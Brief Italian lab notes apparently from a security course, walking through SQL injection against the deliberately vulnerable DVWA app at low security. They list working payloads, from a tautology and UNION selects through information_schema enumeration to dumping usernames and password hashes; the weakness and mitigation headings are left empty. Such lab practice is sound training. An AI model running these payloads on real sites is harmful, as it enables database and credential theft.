ifconfig
→ ip
kali: <browser> ip/login.php → admin password → dvwa security → low
Obiettivo: eseguire comandi SQL arbitrari per estrarre dati dal database
1’ OR ‘1’=’1
1’ UNION select 1, version()#
user()
database()
table_name FROM information_schema.tables WHERE table_schema='dvwa'#
column_name FROM information_schema.columns WHERE table_name='users'#
concat(user_id, ':', first_name, ':', last_name, ':', user, ':', password) FROM users#
Debolezze
Mitigazioni